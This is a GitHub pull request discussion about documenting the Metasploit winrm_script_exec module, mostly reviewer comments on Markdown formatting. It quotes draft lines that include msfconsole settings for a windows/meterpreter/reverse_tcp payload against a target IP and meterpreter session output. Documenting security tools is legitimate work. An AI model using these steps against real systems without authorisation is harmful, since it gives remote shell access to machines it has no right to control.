New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Documentation on winrm_script_exec #8130
Conversation
I'll check it out in a few hours |
@hoodie I also need to know what will happen we get a successful meterpreter session. I can't get a successful session and hence I cannot write the documentation further. Thanks in advance. |
## Vulnerable Application | ||
|
||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
lets bold IMPORTANT and add an extra newline before it (so its on its own line)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
How do I bold in github using this " ** bolded text ** "? How to add an extra line in an md file in github. Just by using the 'Enter' key or there is some other process ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
**bold**
bold
yea just hit enter again to add an extra newline.
In markdown if an item is on a new line (line 3 and 4) when processed its kept on the same line. If there is an EMPTY line between, its treated as a new line when interpreted.
|
||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. | ||
[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
dont think this is needed, i think you can remove it
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Remove which part? The exploit db source or the entire portion?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
edb portion
@@ -0,0 +1,67 @@ | |||
## Vulnerable Application | |||
|
|||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I think this is Vista and newer since #995 references win8
LPORT => 4444 | ||
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 | ||
RHOST => 192.168.198.130 | ||
msf exploit(winrm_script_exec) > show options |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
no need to have the show options since you show all the items which were set
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There are some default configurations given in the 'show options' which I have not added like the URI, SRVPORT etc., Should I remove it still?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
yea, if its default, theres no need to show that it wasn't changed.
@@ -0,0 +1,67 @@ | |||
## Vulnerable Application | |||
|
|||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Check out #995 there may be some comments about configuration changes etc.
If you have to install WinRM or configure it in any way other than a default win install, it would be great to include those as well.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Will check for sure..
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
https://msdn.microsoft.com/en-us/library/aa384372%28v=vs.85%29.aspx
https://msdn.microsoft.com/en-us/library/aa384372%28v=vs.85%29.aspx
https://support.microsoft.com/en-in/help/2019527/how-to-configure-winrm-for-https
Are these three links enough for the later part of your comment?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I generally like it when the markdown has a step by step for configuring (if not default), the doc should be self contained as much as possible.
Still not sure if that would be needed, however see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/centreon_useralias_exec.md#creating-a-testing-environment for an example
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
#995 isn't using any payload. Should I remove the lines:-
+msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
you could try it, but when you don't set a payload msf attempts to set a default compatible payload, so it more than likely just defaulted to something.
I made the requested changes except the part of installing WinRM and configuring it. I am googling about those and I'll make changes soon. @h00die |
|
||
|
||
## Example Usage | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
### Windows 2008
**Powershell 2.0 is used for payload delivery here**
I'd add that so we know what the target is. (don't add the triple ticks, thats just so it doesn't auto-format on the comment)
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 | ||
RHOST => 192.168.198.130 | ||
|
||
**Powershell 2.0 is used for payload delivery here** |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove this line, it'll be outside of the code block
meterpreter > getpid | ||
Current pid: 568 | ||
meterpreter > | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
end the code block here (triple ticks)
meterpreter > | ||
|
||
**In case the VBS CmdStager is used for payload delivery here** | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
start a new code block here
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Should I start a code block using triple ticks too? And are triple ticks '###' ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
` x3, and yup
meterpreter > | ||
|
||
|
||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove all these extra newlines at the end here. you can keep one
PS docs are looking good so far, a few minor touchups and this should be land-able this weekend. Docs seem easy, take someone's work and just run it, copy+pate, and done. However, as has been noted by other r7 people, its actually pretty time consuming to set up the environment, write down any changes or oddities (like vbs vs psh here). While it won't get you glory, it makes a big difference when someone looks at the module a few years later, or it isn't working for some reason. So thanks for spending the time and knocking this one out! |
@h00die Writing the docs are helping me learn how to use the exploits. I am a GSOC aspirant and I've got one month to prove myself. So I'll work on the docs and also some other minor issues this month to get a hang about the basics of how things work and it is a great honor to work for Metasploit whether I get selected for GSOC or not. |
|
||
## Example Usage | ||
|
||
## Windows 2008 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
add one more #
here
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
One more '#' as in it should look like: -
+### Example Usage
+
+### Windows 2008
WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). | ||
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
|
||
**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove the -
here
|
||
``` | ||
|
||
**In case the VBS CmdStager is used for payload delivery here** |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Change this to be **VBS CmdStager is used for payload delivery here**
[*] Current server process: mSPvA.exe (3548) | ||
[+] Migrating to 580 | ||
[+] Successfully migrated to process | ||
[*] nil |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
this line is funny to me, nothing you did, but prob a print in the module that didn't check it was nil before printing it. at least it didn't crash!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Tell me what changes I should make
any other changes or things youre waiting on for this, I think its ready to go, just want to double check |
|
||
**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. | ||
|
||
### Example Usage |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
2 # here
|
||
### Example Usage | ||
|
||
### Windows 2008 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
3 here (like it is now, its good)
Release NotesDocumentation for the |
Git hub issue:- KB for exploit/windows/winrm/winrm_script_exec fixes #7129
Documentation